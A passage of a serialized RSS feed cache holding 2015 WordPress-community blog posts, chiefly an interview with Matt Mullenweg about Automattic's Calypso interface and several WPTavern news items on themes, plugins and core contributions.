                                                                It’s new to me, but Matt says he’s been saying it for years, that he calls WordPress websites “WordPresses,” after a long time internal debate about whether to call WordPress.com websites sites or blogs.

                                                                \n

                                                                WordPress.com as a network versus a platform

                                                                \n

                                                                The new homepage for logged in users, or users in the WordPress.com app, defaults to the Reader view of the interface, versus the writing view. This intrigued me, as I don’t personally think of WordPress.com as a read-first ecosystem, but rather a place to write. I think more of Tumblr or Medium when I think of a destination for reading, where I may also write.

                                                                \n

                                                                Matt and I talked about the merits of WordPress as a network versus a platform. He thinks it can be both. And I think this touches on one of the big goals for Calypso that we haven’t discussed yet: to make WordPress a better network.

                                                                \n

                                                                To me, WordPress.com is a platform, but WordPress (both .com and Jetpack enabled sites) are ripe to be a hugely successful network, through the huge number of websites and independent publishers that are interconnected via WordPress.com.

                                                                \n

                                                                There is more evidence that this is a goal for them too, with the launch of Discover WordPress along with the release of the new interface. Discover WordPress is a project by the editorial team to surface the best writing across WordPress.com and Jetpack enabled websites.

                                                                \n

                                                                Furthermore, beyond the human curated content, much could be done in the future algorithmically. We didn’t get as much into this stuff as I would’ve liked, but I think it’s  an enormous growth area for Automattic.

                                                                \n

                                                                Open sourcing Calypso

                                                                \n

                                                                The Calypso project code is fully open source, and is a top trending project on Github right now. There are few requirements to run the code locally, so you can pretty quickly get a working web view.

                                                                \n

                                                                There are a slew of fancy React components that could be pretty easily lifted from Calypso and used independently, as well as a guide to getting started with the full codebase.

                                                                \n

                                                                How can the community anticipate the future, with more abstracted implementations of WordPress?

                                                                \n

                                                                As WordPress projects continue to use REST APIs to create fully custom frontends, backends, and inbetweens, I was curious what Matt thinks the community can do to anticipate and educate users on how to deal with these scenarios, that may fragment WordPress and be confusing for people who expect WordPress plugins and code to interact well with one another.

                                                                \n

                                                                He doesn’t think it’s too much of a problem, but says it’s important that we experiment and learn from our experiments; he was hesitant to call the potential for confusion fragmentation as much as experimentation. Either way, I do think education and documentation will be important as other folks continue to use parts of WordPress to make impressive things, without supporting every specific thing that can also run on WordPress.

                                                                \n

                                                                An example of this is the WordPress.com app itself. You can manage Jetpack enabled sites through it, but that doesn’t mean you get everything in the editor you’d get with a WordPress.org site, like custom fields and other plugin functionality that the desktop app doesn’t support.

                                                                \n

                                                                What is Automattic’s differentiating factor?

                                                                \n

                                                                I wanted to know what Automattic’s differentiating factor is, in Matt’s mind. He defaulted, I guess unsurprisingly, to “everything,” but as I pushed him a little further, he dug a bit more into some of the things that make Automattic interesting.

                                                                \n

                                                                From a self-hosted perspective, WordPress.com integrated tools like Stats, VaultPress, and Akismet are difficult to match with other tools.

                                                                \n

                                                                For WordPress.com, he thinks the potential power of the Reader and network can be compelling. I agree there that the diversity of the WordPress.com and Jetpack author audience could make for a compelling Reading product, that has more potential than I see right now in a competitor like Medium, which is quite tech heavy.

                                                                \n

                                                                Matt says, “We’ve built up a lot of trust in the community, and that goodwill definitely pays back.” Part of what makes it hard to identify Automattic’s specific differentiator is that they do a lot of things. Matt acknowledged this, but counters by saying that they work hard on user experience and being a good community citizen.

                                                                \n

                                                                How have teams changed at Automattic over time?

                                                                \n

                                                                Automattic scales by splitting teams when they get too big. Today, there are 46 teams. Some of those teams are embedded in larger teams and have some hierarchy, but the company is still quite flat for a company of 400 people.

                                                                \n

                                                                The rule of thumb Matt wants to maintain is that someone should have no more than 10 people that report directly to them, though he has around 23.

                                                                \n

                                                                According to the standards of the tech world, Automattic’s scale in terms of the number of employees may be somewhat ordinary, but they have still had massive and consistent change over the decade of the company’s existence. And they are hiring as fast as they can to this day.

                                                                \n

                                                                The challenge of customizing WordPress sites

                                                                \n

                                                                A couple of years ago, someone from Automattic told me how concerned they were about the WordPress customizer’s ability to scale, both for use on mobile devices, and as a utility that could manage a lot of features. And I wanted to know how Matt thinks that has evolved, now that the customizer is in such significant use on both WordPress.com and for self-hosted websites.

                                                                \n

                                                                As he notes, the customizer has undergone a lot of positive iteration over the last several releases, and today the WordPress.com and WordPress.org customizers are using the same base code; whereas for a while WordPress.com had their own custom implementation.

                                                                \n

                                                                But he still says that, “If we’re candid with ourselves, … customization is still the worst part of WordPress, you know? It’s the hardest. It’s where people get stuck. It’s where there’s a real gap between the promise and what people are able to realize and create when they get started using WordPress.”

                                                                \n

                                                                It’s not as much a problem with the use of themes, or if you can code, but for new users, “it’s their biggest struggle.”

                                                                \n

                                                                One idea that I have is to have a more Medium-like interface be the “default” view, versus a changing default theme. That way, WordPress.com could be more opinionated about the default view, and change the theme at will, or along with trends, versus giving new users the default theme of a particular year and then that theme is untouched unless the user decides to switch.

                                                                \n

                                                                Matt said they have that a bit on the Reader view, but that is what someone in the WordPress.com network would see, versus what an outside website visitor would see.

                                                                \n

                                                                Anyway, there are definitely challenges ahead for enabling customizations and, more importantly, just ensuring sites look good for users. I think that this is an area where other platforms — like Medium and Squarespace, though in different ways — are doing a good job.

                                                                \n

                                                                The first line of the Automattic creed

                                                                \n

                                                                The Automattic creed states at the very beginning, “I will never stop learning.” That was part of Matt’s response when I asked just how they managed to cross-train a workforce that was primarily made of PHP developers to create a world-class JavaScript driven application.

                                                                \n

                                                                Additionally to the natural desires that Automattic employees should have to learn, they created internal resources for helping people, and are considering releasing some of that material, maybe in the form of webinars or an online conference.

                                                                \n

                                                                Matt said Automatticians will also be sharing what they learn at other conferences, like the upcoming A Day of REST, where two Automatticians will be speaking.

                                                                \n

                                                                Matt did admit that he hasn’t made the PHP to JavaScript switch yet, and personally feels more comfortable in PHP; though some of his team have said it wasn’t as intimidating as it sounds.

                                                                \n

                                                                Bug bounties

                                                                \n

                                                                Did you know all Automattic properties are on Hacker One, the bug bounty community? If you find a security bug, you can get a bounty if you report it. I didn’t know this until the Calypso launch.

                                                                \n

                                                                How is Automattic thinking about revenue?

                                                                \n

                                                                With my napkin math and a few small things I know about Automattic, I’d guesstimate they are somewhere in the neighborhood of $100 million in annual revenue. I didn’t even attempt to get confirmation of this, because I know they don’t reveal this kind of information. So instead I wanted to get more insights of how Matt thinks about revenue at Automattic.

                                                                \n

                                                                Generally, he says they put their focus in, “three main buckets.” They use that focus both for revenue purposes and product purposes. Those areas are WordPress.com, Jetpack, and WooCommerce.

                                                                \n

                                                                They group things like VaultPress and Akismet under Jetpack; so it’s basically their WordPress.org SaaS revenue stream. Those are paid subscription products.  They have been transitioning that offering, as Matt shared, “a big trend over the past few years, has been to move away from a la carte upgrades, and have more bundles.”

                                                                \n

                                                                They’ve discovered that bundled plans of $100 per year and $300 per year have been successful. Here are those plans, for both WordPress.com and WordPress.org, as shown in the new WordPress.com/Calypso interface:

                                                                \n

                                                                \"wp-org-plan\"\"wpcom-plan\"

                                                                \n

                                                                It appears they get most of their revenue from this stream. I do know, and have previously reported, that at least at one point, WordPress.com VIP accounted for upwards of 25% of overall revenue, and though that gross number has gone up over the years, its percentage of overall revenue has gone down, meaning that these paid plans have outpaced VIP, growth-wise. I’d guess VIP revenue is now less than half of that 25% number now, but can’t confirm it.

                                                                \n

                                                                Total sites, versus engagement

                                                                \n

                                                                There are a lot of WordPress.com websites, but as Matt noted, it’s a vanity metric due to the fact that such a small percentage are active, engaged users. So they are trying more to track engagement versus total sites.

                                                                \n

                                                                I tried to get him to share the number of active websites, but that’s not something he could share.

                                                                \n

                                                                Helping site owners monetize, and WooCommerce integration to WordPress.com

                                                                \n

                                                                I talked about the roadmap some, and asked Matt about what they may offer in the future to help authors monetize their sites. They currently have a WordAds program, but that is a pageview driven strategy, and I’d love to see them introduce a way for authors to get paid via a tip jar, private paid posts, or subscription system like I’ve heard Medium is investigating. It’s not on their current roadmap, but he says he’d be open to it.

                                                                \n

                                                                He also noted that since WooCommerce is now “part of the family,” that there may be future monetization opportunities through that, though he said they don’t have current plans for a hosted version of WooCommerce on WordPress.com. I was honestly pretty surprised by this:

                                                                \n

                                                                In the beginning, our focus is really going to be on people hosting their stores, you know, with web hosts. Because, part of the beauty of why WooCommerce is so popular is the flexibility, and I don’t think the usability is there — yet — to be competitive with, like, a  Shopify, or a BigCommerce. So, it’s just a lot of work to do there.

                                                                \n

                                                                Matt said he thinks of WooCommerce as how WordPress was around version 1.5. He called it, “very early days”, in that people are using it and see the potential, but says, “there’s just so much to work on and improve to make it accessible to a wider audience.”

                                                                \n

                                                                He says the Woo team is now 63 people, and a number of Automatticians are doing “Wootations,” or rotations with the Woo team.

                                                                \n

                                                                What to expect next in the new WordPress.com interface

                                                                \n

                                                                They are still working on a lot of things for the new interface. There are certain things that aren’t there yet. For instance, showing and hiding your sites you are personally attached to still requires the regular admin. I actually experienced this myself. Some parts of the interface are pretty circular and confusing.

                                                                \n

                                                                But they plan to do more going forward; their values on the project state that, “we are here for the long haul.” They want to see what there is demand for, and what other people do with the open source nature of the project.

                                                                \n

                                                                Matt also noted that he’d like to “loop back” to content blocks (code named CEUX) — the project that stalled last year. And he’s like to see what can be done around collaboration, editing, and the suggestion process.

                                                                \n

                                                                Power and ease of use

                                                                \n

                                                                One of the biggest challenges for WordPress is to continue to get easier to use, as other avenues for sharing information have gotten easier and easier, while continuing to enable powerful, feature rich implementations of WordPress.

                                                                \n

                                                                Matt thinks this balance is important, and that we must continue to improve in both directions to continue WordPress’s growth.

                                                                \n

                                                                Wrapping up

                                                                \n

                                                                I really enjoyed my first audio interview with Matt. He says we can expect more announcements around WordCamp US, which starts next week.

                                                                \n

                                                                The Calypso project is a fascinating one, and it’s a great example of what we should continue to expect: powerful, catered tools that run on a RESTful API. They aren’t always going to be tools for use everywhere, but we can expect to continue to see WordPress used in innovative ways, and be an exceptional platform for all kinds of applications.

                                                                \n

                                                                And finally, at the end of the interview, I pitched Matt on one of my most harebrained ideas. The naming conflict between WordPress.com and WordPress was really bad with this project, as nearly everyone not deeply embedded within the WordPress world got it wrong, and conflated Automattic’s WordPress.com with WordPress the software.

                                                                \n

                                                                And I think Jetpack’s brand has really blossomed. I think there is an argument to be made that Automattic could change the name of WordPress.com to Jetpack, and both Automattic and WordPress would win from the change. It wouldn’t be easy, but all I asked from him, is whether he’d read my post if I wrote one to give the pitch. He said he would, so expect that sometime soon.

                                                                \n

                                                                Thanks to Matt for the interview, and thanks to Mark Armstrong for helping me get going with the new WordPress.com app and arranging the interview.

                                                                \n

                                                                * Photo credit Sheri Bigelow

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 25 Nov 2015 19:13:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"WPTavern: The WordPress Theme Directory Replaces Download Counts With the Number of Active Installs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49123\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:109:\"http://wptavern.com/the-wordpress-theme-directory-replaces-download-counts-with-the-number-of-active-installs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3429:\"

                                                                Earlier this year, the WordPress plugin directory was redesigned. As part of the redesign, download counts were replaced with the number of Active Installs to reflect more accurate data. The WordPress theme directory has finally followed suit by replacing download counts with the number of Active Installs.

                                                                \n\"ActiveActive Installs of Twenty Fifteen\n

                                                                As you can see from the above screenshot, the Twenty Fifteen default theme included in WordPress 4.1, 4.2, and 4.3, is active on more than one million sites. Active themes are those that are activated and in use on a site. Themes that are installed and not activated are not counted, neither are child themes.

                                                                \n

                                                                In the Themereview Slack Channel, Tom Usborne explains why active installs for child themes should be counted.

                                                                \n

                                                                I think an argument for child themes to be included in the active installs count can be made. For example, we offer a completely blank child theme for our customers so they can make CSS and PHP adjustments. This means our install count isn’t accurate on w.org, even though those people are using the theme actively.

                                                                \n

                                                                Dion Hulse, WordPress lead developer, agrees that child themes should be counted but the team doesn’t have the data yet. Some theme authors are concerned that new themes will have a tough time making it on the popular themes page.

                                                                \n

                                                                Originally, the popular themes page was determined by the number of downloads over the previous week, which led to some authors to try to game the system. Hulse says, “The actual comparison between active installs and the previous week’s downloads were very similar, except for a handful of themes that had a lot more downloads than installs.”

                                                                \n

                                                                Hulse plans to experiment with the algorithms to give newer themes a chance, “I’m also looking at ranking popular themes based on the age of the theme and installs, which will help promote some of the newer themes,” he said.

                                                                \n

                                                                Thanks to active install counts for themes, we can see which default WordPress theme is the most popular.

                                                                \n
                                                                  \n
                                                                • Twenty Fifteen 1+ Million
                                                                • \n
                                                                • Twenty Fourteen 800K+
                                                                • \n
                                                                • Twenty Twelve 500K+
                                                                • \n
                                                                • Twenty Eleven 500K+
                                                                • \n
                                                                • Twenty Ten 300K+
                                                                • \n
                                                                • Twenty Thirteen 300K+
                                                                • \n
                                                                \n

                                                                Download counts are a terrible way to determine a theme or plugin’s popularity which is why I support this change. It’s more accurate and helps to further level the playing field for authors. Are you a fan of the change and if you’re a theme author, what other stats would you like to see?

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 25 Nov 2015 08:31:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"WPTavern: Justin Tadlock Is Seeking Beta Testers for His First Major Commercial Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49112\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"http://wptavern.com/justin-tadlock-is-seeking-beta-testers-for-his-first-major-commercial-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2712:\"

                                                                Justin Tadlock, founder of Theme Hybrid, is looking for beta testers for a new plugin aimed at theme developers. The plugin is called Theme Designer and allows authors to manage themes in the WordPress backend. It also displays them on the frontend similar to WordPress.com and WordPress.org’s theme pages.

                                                                \n

                                                                Tadlock has moved beyond using WordPress pages to display and manage themes, “I’m not sure what everyone else is doing, but I’ve been building and tweaking a custom solution for a number of years. I’ve just never packaged it up and made it useful for others,” he said.

                                                                \n\"ManageManage Themes in the WordPress Backend\n

                                                                Under the hood, it uses a custom post type, taxonomies, custom metadata, and a number of hooks. Theme Designer can pull data from the WordPress.org theme directory API and store it on your site. There’s also a built-in feature set for adding custom meta fields to the edit theme screen.

                                                                \n

                                                                In addition to managing themes, Tadlock plans to create add-ons and integrate Theme Designer with other plugins. He’s already created an add-on for Easy Digital Downloads and it’s possible he’ll create one for WooCommerce.

                                                                \n

                                                                Tadlock’s First Commercial Plugin

                                                                \n

                                                                During the beta testing period, Theme Designer will be free of charge. When the beta is complete, Tadlock will charge for access making it his first major commercial plugin. Theme Designer will come in two flavors, a supported and non-supported version.

                                                                \n

                                                                The supported version gives customers a developer level membership to Theme Hybrid which is currently $35 a year. The non-supported version contains the plugin only. Both versions will have free lifetime updates.

                                                                \n

                                                                To participate in the beta testing process, grab the free plugin from GitHub. Pull requests and reporting issues are welcomed. It’s important to note that Theme Designer is only compatible with WordPress 4.4 and is a work in progress so it should not be used on a live site.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 24 Nov 2015 22:26:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"WPTavern: Stanko Metodiev’s First-time Experience Contributing Patches to WordPress Core\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49104\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"http://wptavern.com/stanko-metodievs-first-time-experience-contributing-patches-to-wordpress-core\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2041:\"

                                                                Stanko Metodiev, project manager for Devrix, shares his experience contributing a patch to WordPress core for the first time. While browsing Trac, Metodiev discovered a bug report with the menu customizer.

                                                                \n

                                                                Although a patch was already attached to the ticket, it didn’t work, “The change didn’t fix the issue for me, so I submitted a new patch to adjust the size by a few more pixels,” Metodiev said.

                                                                \n

                                                                The change was merged into core by WordPress lead developer, Helen Hou-Sandí.

                                                                \n\"MergedMerged into Core\n

                                                                It’s a small change but as I learned from my experience contributing to core, every merged patch is important no matter how small it is. Metodiev offers the following advice to new contributors, “Don’t be scared and don’t be shy. The core team is hospitable, especially for first timers and they will give guidance and advice if needed, so feel free to contribute patches!”

                                                                \n

                                                                Since his experience with WordPress 4.3, Metodiev continues to contribute to core and has seven merged patches in WordPress 4.4. If you’re thinking about contributing patches to core but don’t know where to start, I highly encourage you to read the Core Contributor Handbook. In it you’ll find best practices, testing techniques, and how to submit patches to Trac.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 24 Nov 2015 20:55:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"Matt: Calypso, 24 Hours Later\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=45628\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://ma.tt/2015/11/calypso-24-hours-later/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7560:\"

                                                                The reaction to yesterday’s Calypso announcement has really blown me away.Here’s a tiny selection of of the coverage, analysis, and reactions to Calypso and the new WordPress.com:

                                                                \n

                                                                \n

                                                                “If you’re a regular user, you’ll notice a new look and feel. If you’re a code geek, you’ll notice something more remarkable below the surface: JavaScript instead of PHP.” Wired

                                                                \n

                                                                “…I am personally extremely excited about this. Not only because the new UI is really nice and pleasant to use but also because this finally shows the modern side of WordPress, or at least starts to…” VersionPress

                                                                \n

                                                                Damn. Can\'t wait to dig into the new WP digs @photomatt and co have knocked together. Huge congrats, looks amazing: https://t.co/TJGgbBwHb0

                                                                \n

                                                                — Craig Mod (@craigmod) November 24, 2015

                                                                \n

                                                                \n

                                                                “What I love most about the whole project is the lessons it has for everyone regarding innovation.” Chris Lema

                                                                \n

                                                                “So why did Automattic, the company behind WordPress.com, go through this painful rewriting process? WordPress.com now feels and works like a modern web app. It’s back in the game against newcomers, such as Medium.” TechCrunch

                                                                \n

                                                                “Calypso looks like a huge leap forward for a project that seemed to stagnate for many years.” The Next Web

                                                                \n

                                                                “Clean, responsive, faster than ever… WordPress is such a great success story. I’m very happy I chose to use it over six years ago.” Mac Stories

                                                                \n

                                                                So impressed by the risk @photomatt and the @WordPress community took with Calypso. Faster, modern and still open. https://t.co/h0B2K0mo6k

                                                                \n

                                                                — ? Chris Messina ? (@chrismessina) November 23, 2015

                                                                \n

                                                                \n

                                                                “Calypso is a great example of what’s possible with the WordPress REST API.” WP Tavern

                                                                \n

                                                                “I think the new WordPress.com editor, and the corresponding WordPress.com app, are a great improvement to the writing experience… [T]he investment they’ve made is a smart one.” Post Status

                                                                \n

                                                                WordPress just got interesting again. They\'re rebooting on modern web tech to take on Medium https://t.co/oVW1uGs0gu pic.twitter.com/TT6tJDkQcG

                                                                \n

                                                                — Owen Williams (@ow) November 23, 2015

                                                                \n

                                                                \n

                                                                “… the fastest and most streamlined WordPress experience so far.” 9 to 5 Mac

                                                                \n

                                                                VentureBeat also reported on the launch yesterday, and there’s a longer interview with me up there today.

                                                                \n

                                                                WordPress\' new Calypso is also another GitHub success story https://t.co/pcLGgIKQph pic.twitter.com/ZnVNGabv6l

                                                                \n

                                                                — Mikeal Rogers (@mikeal) November 24, 2015

                                                                \n

                                                                \n

                                                                So far, we’ve seen articles in French, Indonesian, German, Spanish,  and Russian. Calypso is a trending repo on GitHub. The news was on top of TechMeme, and voted to the top of Product Hunt, and even Hacker News.

                                                                \n

                                                                One of my favorite takes was from Om Malik, in “Some Thoughts on the New WordPress.com and Mac App”:

                                                                \n
                                                                \n

                                                                I view the shift to this newer, more flexible model as a way for WordPress.com to adapt to become a growing part of the open web. Blogging has always been mistaken for its containers, tools, the length of the posts or just a replacement for the rapid-fire publishing of old-fashioned news. In reality, blogging is essentially a philosophy built on the ethos of sharing.

                                                                \n

                                                                Today sharing on the internet is a major social behavior: We share photos, links, videos, thoughts, opinions, news. Except instead of sharing on a blog, we do the sharing in increasingly proprietary and corporate silos: Instagram, Facebook, YouTube, Twitter, Periscope and LinkedIn. You see, the blogging ethos is alive and well. However, the old blogging tools have to embrace change.

                                                                \n
                                                                \n

                                                                At the end of the day, it’s not about technology for technology’s sake, it’s about technology at the service of human voices. Embracing change to support the free, open web where everyone has a voice.

                                                                \n

                                                                Finally, it was a weird coincidence we didn’t even notice, but the Calypso announcement was ten years to the day after we opened up WordPress.com.

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 24 Nov 2015 19:42:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"WPTavern: Automattic Unveils Open Source WordPress.com Desktop Application for the Mac\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49077\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"http://wptavern.com/automattic-unveils-open-source-wordpress-desktop-application-for-the-mac\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5489:\"

                                                                In the last two years, Automattic has made significant improvements to WordPress.com and Jetpack. From managing plugins, themes, and other updates to New Dash and a revamped post editor. The individual changes represent iteration but when seen as a whole, show off an entirely new WordPress.com.

                                                                \n

                                                                Automattic has announced that the improvements its made in the last two years are part of an internal project named Calypso. The company also released a WordPress.com desktop application for the Mac and open sourced the code on GitHub.

                                                                \n

                                                                The application is written entirely in JavaScript using the Node and React libraries. It’s also 100% reliant on APIs, including the REST API.

                                                                \n

                                                                My Experience with Calypso

                                                                \n

                                                                Over the weekend, I tested the application on my Macbook Pro. I initially thought it was inconsistent as there were many instances where a button opened a browser and took me outside the app. However, Calypso has gone through a number of updates and most of the inconsistencies have disappeared.

                                                                \n\"Calypso1\"Calypso\n

                                                                Most of what you’re able to accomplish in the WordPress backend you can do in the app including, editing posts, creating drafts, and moderating comments.

                                                                \n

                                                                \"Calypso2\"Although there is the occasional Beep….Beep….Boop, the application is fast. Some of the pages within the app feel like they load faster than their browser counterparts. Some things still require action from within a browser such as applying updates. This doesn’t make sense considering the Jetpack Manage module is enabled.

                                                                \n

                                                                When managing themes, I noticed at least two of the them don’t include the white bottom bar making the titles difficult to read. Also, the details link loads a browser window to the backend of the site I’m managing. It feels like an interruption instead of a seamless experience. There should be no reason to load a browser window except for previewing a post.

                                                                \n\"Calypso3\"Managing Themes in Calypso\n

                                                                If you’re familiar with or use the WordPress.com post editor, the editor in Calypso is pretty much the same.

                                                                \n

                                                                For years I’ve written posts with meta boxes on the right and getting used to them on the left will take a while. The editor has most of the features available in WordPress. For example, oEmbed support which many other third-party WordPress apps don’t have.

                                                                \n

